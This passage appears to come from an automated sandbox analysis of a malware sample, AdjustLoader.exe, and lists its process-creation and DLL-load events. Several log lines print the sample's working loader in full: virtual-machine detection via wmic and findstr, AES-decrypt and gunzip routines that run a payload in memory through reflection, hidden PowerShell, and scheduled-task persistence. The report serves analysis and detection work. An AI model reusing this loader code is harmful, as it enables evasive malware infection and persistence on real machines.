lags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $FisCHMOcbia.CreateType();}$beUOypwDoUbYD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cro'+[Char](115)+''+'o'+'f'+'t'+'.'+'W'+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+'t'+''+'h'+'o'+[Char](100)
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bd6193ea-62bd-4d0d-9eeb-00767b2d70f2}
Source: C:\Users\user\Desktop\AdjustLoader.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1' Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bd6193ea-62bd-4d0d-9eeb-00767b2d70f2}
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
